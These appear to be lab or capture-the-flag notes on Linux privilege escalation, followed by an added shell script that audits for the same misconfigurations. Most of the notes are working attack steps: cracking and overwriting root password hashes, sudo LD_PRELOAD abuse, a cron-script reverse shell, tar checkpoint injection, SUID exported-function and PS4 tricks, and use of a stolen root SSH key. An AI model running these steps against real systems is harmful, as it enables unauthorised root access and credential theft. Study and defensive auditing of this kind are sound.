Log in to [email protected] using the password password321.
MySQL was seen running on the server, so a classic MySQL technique mentioned here was used.
Since /etc/shadow could be read by the current user, the root user's password hash could be extracted, as shown here.
Cracked the hash using john.
ls -l /etc/shadow showed that the file could be written by the current user.
mkpasswd -m sha-512 <new-password> generates a new hash, which can replace the root user's hash in /etc/shadow to escalate privileges.
Check whether /etc/passwd is writable; if it is, privilege escalation is easy.
openssl passwd <new-password-here> produces a hash; in /etc/passwd, replace the x in root:x:0:0:root:/root:/bin/bash with the openssl output.
sudo -l lists the binaries the user can run as root, which can be used to gain privileges.
sudo -l also shows the environment variables that are inherited.
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c, then run a program that is allowed via sudo with LD_PRELOAD set to the object file: sudo LD_PRELOAD=/tmp/preload.so vi.
Another method: if LD_LIBRARY_PATH appears in the sudo -l output, this method is applicable.
Run ldd on the script/file.
sudo LD_LIBRARY_PATH=<path-to-obj-file> <script/program>
/etc/crontab lists the files that are run regularly, which often require root privileges.
crontab can give an advantage: files listed in the crontab that are also writable give a chance of privilege escalation.
overwrite.sh was listed in crontab and was also writable.
overwrite.sh was used to establish a reverse shell, and a root reverse shell was obtained.
cat /etc/crontab lists the system-wide crontab.
Another entry in /etc/crontab was /usr/local/bin/compress.sh.
The script ran tar czf /tmp/backup.tar.gz *; since tar operated on a wildcard *, it could be exploited. Looking at GTFOBins, we found that tar has a command-line option that lets us run other commands as part of a checkpoint feature.
Filenames such as --checkpoint and --checkpoint-action=exec=<rev-shell> are valid tar options, so tar treats them as command-line arguments.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null finds all the SUID/SGID executables.
find / -type f -perm /4000 2>/dev/null can also be used.
strace reveals open/access calls that fail with "no such file" errors: strace <path-to-SUID-exec-file> 2>&1 | grep -iE "open|access|no such file".
This should make the SUID file open the just-created file with root privileges, and since it is a reverse shell / bash shell, it should spawn a bash shell with root privileges.
function /usr/sbin/service { /bin/bash -p; } and export it using export -f /usr/sbin/service. Basically, this defines a bash function whose name is the file path the SUID binary calls, so that name resolves to our function.
Since the path in the SUID/SGID file matches a bash function, the function is executed before the real file path is ever reached.
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/tmp/rootbash -p gives a bash shell with root privileges.
cat ~/.*history | less
Check the .ssh directory to see whether it is readable with the current user's permissions.
root_key is the private key for SSH.
chmod the root_key file to 600 (rw for the owner only).
ssh -i root_key root@<ip> to get into the server.
Files created via NFS inherit the remote user's ID; if the user is root and root squashing is enabled, the ID will instead be set to the "nobody" user.
cat /etc/exports to find the path.
mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs after creating a /tmp/nfs directory.
The linux-exploit-suggester-2.pl tool identifies potential exploits on the system.
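From the defensive side, the misconfigurations these notes rely on (a writable /etc/shadow or /etc/passwd, sudo keeping LD_PRELOAD or LD_LIBRARY_PATH, writable scripts in /etc/crontab, and no_root_squash NFS exports) are all cheap to audit. The script below is an added example, not part of the original notes; the file paths, sample file contents and the AUDIT_DIR working directory are constructed for illustration.

```shell
#!/bin/sh
# Added audit example (not from the original notes): report the misconfigurations the
# walkthrough relies on. Each check takes a file path so it can be pointed at the real
# /etc/shadow, /etc/passwd, /etc/exports, /etc/sudoers or /etc/crontab.

# 0 when the group or other write bit is set on $1 (columns 6 and 9 of `ls -l`).
group_or_other_writable() {
    bits=$(ls -ld "$1" 2>/dev/null | cut -c6,9)
    case "$bits" in *w*) return 0 ;; *) return 1 ;; esac
}

# 0 when a non-comment line of an exports file ($1) contains no_root_squash,
# i.e. a remote root keeps uid 0 on files it creates on the share.
exports_no_root_squash() {
    grep -v '^[[:space:]]*#' "$1" | grep -q 'no_root_squash'
}

# 0 when a sudoers file ($1) keeps LD_PRELOAD or LD_LIBRARY_PATH in env_keep.
sudoers_keeps_ld_env() {
    grep -v '^[[:space:]]*#' "$1" | grep 'env_keep' | grep -qE 'LD_PRELOAD|LD_LIBRARY_PATH'
}

# Print each command path from a system crontab ($1) that group/other can write.
# Field 7 of a system crontab line is the command; VAR=value lines are skipped.
cron_writable_scripts() {
    awk '!/^[[:space:]]*#/ && !/^[A-Za-z_][A-Za-z0-9_]*=/ && NF >= 7 { print $7 }' "$1" |
    while read -r cmd; do
        if [ -f "$cmd" ] && group_or_other_writable "$cmd"; then echo "$cmd"; fi
    done
}

# Constructed sample files (not from any real host) so the checks can run offline.
AUDIT_DIR=$(mktemp -d)
printf 'root:$6$placeholder:19000:0:99999:7:::\n' > "$AUDIT_DIR/shadow"
chmod 666 "$AUDIT_DIR/shadow"                  # world-writable, as seen in the notes
printf '/tmp *(rw,sync,no_root_squash)\n' > "$AUDIT_DIR/exports"
printf 'Defaults env_keep += "LD_PRELOAD"\n' > "$AUDIT_DIR/sudoers"
printf '#!/bin/sh\necho backup\n' > "$AUDIT_DIR/overwrite.sh"
chmod 666 "$AUDIT_DIR/overwrite.sh"
printf 'PATH=/usr/bin\n* * * * * root %s\n' "$AUDIT_DIR/overwrite.sh" > "$AUDIT_DIR/crontab"

if group_or_other_writable "$AUDIT_DIR/shadow"; then echo "FINDING: shadow writable by non-owner"; fi
if exports_no_root_squash "$AUDIT_DIR/exports"; then echo "FINDING: no_root_squash export"; fi
if sudoers_keeps_ld_env "$AUDIT_DIR/sudoers"; then echo "FINDING: sudo keeps LD_* variables"; fi
cron_writable_scripts "$AUDIT_DIR/crontab" | sed 's/^/FINDING: writable cron script: /'
```

Point the functions at the real system files (for example cron_writable_scripts /etc/crontab) to run the same checks on a host; anything reported should be fixed with chmod, by dropping LD_* from env_keep, or by removing no_root_squash.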